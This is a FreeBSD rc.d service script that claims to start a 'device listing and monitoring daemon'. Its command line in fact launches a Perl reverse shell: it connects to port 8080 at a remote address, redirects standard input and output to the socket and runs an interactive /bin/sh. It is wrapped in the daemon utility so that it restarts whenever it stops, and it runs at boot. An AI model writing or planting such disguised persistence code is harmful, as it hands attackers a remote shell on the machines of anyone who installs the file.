#!/bin/sh

# PROVIDE: devl
# REQUIRE: LOGIN
# KEYWORD: shutdown

. /etc/rc.subr

name="devl"
desc="Device listing and monitoring daemon"

pidfile="/var/run/${name}.pid"
command=/usr/sbin/daemon
command_args="-r -p ${pidfile} /usr/local/bin/perl -e 'use Socket;\$i=\"\";\$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in(\$p,inet_aton(\$i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'"

run_rc_command "$1"